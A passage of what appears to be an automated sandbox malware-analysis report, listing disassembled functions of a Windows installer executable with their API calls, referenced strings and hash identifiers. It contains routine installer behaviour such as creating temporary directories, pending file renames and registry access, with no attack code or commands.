                                                                                                                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                                                                                                                  • API String ID: 1646373207-2130885113
                                                                                                                                                                                                                                  • Opcode ID: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                                                                                                                                                                  • Instruction ID: a781b9bdaab79611976bfea65fa4e072d6e85bd62b4b6e26dfe65079d72397a7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7661fd9f0913dad122060e2c1ded37189c483bc636f4dff06c0b7ded89dfa78
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA01D470240B00FED301AF63AD12F663A58D7557ABF6044BBFC14965C2C77C4A088E6D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00430940 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 23registryclipboardthreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430948
                                                                                                                                                                                                                                  • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430957
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00430971
                                                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00430992
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                                                                                                                                                                  • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                                                                                                                                                                  • API String ID: 4130936913-2943970505
                                                                                                                                                                                                                                  • Opcode ID: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                                                                                                                                                                  • Instruction ID: 0bd92e6c8c1c5a5b8444157758b44b4e11dae02c37acc47d2edddbd1fb793b69
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a088dfdc0b2c62b7d21c5c596ec815df7ae76573c78c741c8a86d6eee6cb681
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22F012B0458340DEE300EB65994271E7BD0EF58718F50467FF498A6392D7795904CB5F
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00455010 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C,00000000), ref: 004551BA
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0045522C,0045522C,?,0045522C), ref: 004551C7
                                                                                                                                                                                                                                    • Part of subcall function 00454F7C: WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                                                                                                                                                                    • Part of subcall function 00454F7C: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                                                                                                                                                    • Part of subcall function 00454F7C: GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                                                                                                                                                    • Part of subcall function 00454F7C: CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                                                                                                                                                                  • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                                                                                                                                                                  • API String ID: 854858120-615399546
                                                                                                                                                                                                                                  • Opcode ID: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                                                                                                                                                                  • Instruction ID: 058baa7e90e176347c833b132b7c272bf8058e823d6e061bdbf2f6311869cd9e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ea26466aa0b1bd12af3311b8e232ebea4e464fdb3bb6eef9ccee3db0f285c88
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41516D34B0074DABCF10EFA5D852BDEBBB9AF44305F50447BB804B7292D7789A098B59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042368C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                                                                                                                                                  • OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                                                                                                                                                  • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Char$FileIconLoadLowerModuleName
                                                                                                                                                                                                                                  • String ID: 2$MAINICON
                                                                                                                                                                                                                                  • API String ID: 3935243913-3181700818
                                                                                                                                                                                                                                  • Opcode ID: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                                                                                                                                                                                  • Instruction ID: 339a64ebbf2375270c19ef2cfa2d714624ee8dcb7e06b01b5ae6522dc3b50067
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cdc8d4d12959e52a4e35ddab44250c7989461c9b781fe211d3ab07d5faa44346
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 243181B0A042549ADF10EF29D8C57C67BA8AF14308F4441BAE844DB393D7BED988CB59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00418F38 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F3D
                                                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F5E
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00418F79
                                                                                                                                                                                                                                  • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F9A
                                                                                                                                                                                                                                    • Part of subcall function 004230C8: GetDC.USER32(00000000), ref: 0042311E
                                                                                                                                                                                                                                    • Part of subcall function 004230C8: EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                                                                                                                                                    • Part of subcall function 004230C8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                                                                                                                                                    • Part of subcall function 004230C8: ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                                                                                                                                                    • Part of subcall function 0042368C: LoadIconA.USER32(00400000,MAINICON), ref: 0042371C
                                                                                                                                                                                                                                    • Part of subcall function 0042368C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 00423749
                                                                                                                                                                                                                                    • Part of subcall function 0042368C: OemToCharA.USER32(?,?), ref: 0042375C
                                                                                                                                                                                                                                    • Part of subcall function 0042368C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FE6,00000000,?,?,?,00000001), ref: 0042379C
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                                                                                                                                                    • Part of subcall function 0041F118: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
                                                                                                                                                                                                                                  • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                                                                                                                                                                                  • API String ID: 316262546-2767913252
                                                                                                                                                                                                                                  • Opcode ID: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                                                                                                                                                  • Instruction ID: d883a59e21ed3b4d0722d018b4a025de81f9e45e1fd093e44b5ebaba0e30331f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b417f06b73a7dba032b12b865c8ed9bc6bb92a8bfb887f153b822e9fb73695be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC115E706142419AD740FF76A94235A7BE1DF64308F40943FF448A7391DB3DA9448B5F
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041363C Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 00413664
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0041366F
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 00413681
                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000F4,?), ref: 00413694
                                                                                                                                                                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136AB
                                                                                                                                                                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 004136C2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$Prop
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3887896539-0
                                                                                                                                                                                                                                  • Opcode ID: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                                                                                                                                                  • Instruction ID: 06abc153636d574f2b9d5b42ed2ef1d3d1989bf2b09c04f5b7aa0ee96fd2bcf7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7846fecbe383e6d7fdaea4169180c186d89bab15e88d328ea810806c298c4441
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1011C975100244BFEF00DF9DDC84EDA37E8EB19364F144666B958DB2A2D738DD908B68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004556D8 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045586F,?,00000000,004558AF), ref: 004557B5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • WININIT.INI, xrefs: 004557E4
                                                                                                                                                                                                                                  • PendingFileRenameOperations2, xrefs: 00455784
                                                                                                                                                                                                                                  • PendingFileRenameOperations, xrefs: 00455754
                                                                                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455738
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                  • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                                                                                                                                                  • API String ID: 47109696-2199428270
                                                                                                                                                                                                                                  • Opcode ID: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                                                                                                                                                  • Instruction ID: 0fa1da25f67206326559771d92c7e47b52ca8d856d575cc5f046ac455f5bab2a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 430bb035026106b65f85e2b07525b73901b650abba9068f13605831850c1f819
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF51A974E006089FDB10EF61DC51AEEB7B9EF44305F50857BEC04A7292DB78AE49CA58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0047CB94 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC27
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,0047CCEA,?,?,00000000,0049B628,00000000,00000000,?,00498539,00000000,004986E2,?,00000000), ref: 0047CC30
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                  • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                                                                                                                                                                  • API String ID: 1375471231-2952887711
                                                                                                                                                                                                                                  • Opcode ID: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                                                                                                                                                  • Instruction ID: e6577b7b61f0e0a35e690824fc442bae28cfcbc8f9cba78cd8161ab2dbd6b5d1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18b8a6295044c03030742dd0e1a53df86680db30ea117cbe65252b99daff8b31
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6412834A001099BDB11EFA5D882ADEB7B5EF45309F50843BE81577392DA38AE05CF68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00423A84 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                                                                                                                                                                  • GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                                                                                                                                                                  • SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$EnumLongWindows
                                                                                                                                                                                                                                  • String ID: \AB
                                                                                                                                                                                                                                  • API String ID: 4191631535-3948367934
                                                                                                                                                                                                                                  • Opcode ID: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                                                                                                                                                  • Instruction ID: 3ad81c14f5822e14e615a382c86082b2427cd388a5bf15486a3129e996868218
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f387ac1e946b45dcea70a74dde1e3cf145931a60cd8f654a7309261af8d74ee
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6115E70700610ABDB109F28E885F5677E8EB08715F10026AF994AB2E3C378ED41CB59
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042DE44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE50
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFEB,00000000,0042E003,?,?,?,?,00000006,?,00000000,0049785D), ref: 0042DE6B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE71
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressDeleteHandleModuleProc
                                                                                                                                                                                                                                  • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                                                                                                                                                  • API String ID: 588496660-1846899949
                                                                                                                                                                                                                                  • Opcode ID: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                                                                                                                                                  • Instruction ID: e7246de0df94fba710dd2820c0ca51643d5dd29c3ac0bea476bad59fd0e01b91
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed1542cdc99e60fdc1e6205037aed1b156b4601bf62b1d4fa5b097ff81e7402e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73E06DF1B41B30AAD72022657C8ABA33729DB75365F658437F105AD19183FC2C50CE9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0046BB10 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 320COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Need to restart Windows? %s, xrefs: 0046BE95
                                                                                                                                                                                                                                  • PrepareToInstall failed: %s, xrefs: 0046BE6E
                                                                                                                                                                                                                                  • NextButtonClick, xrefs: 0046BC4C
                                                                                                                                                                                                                                  Memory Dump Source
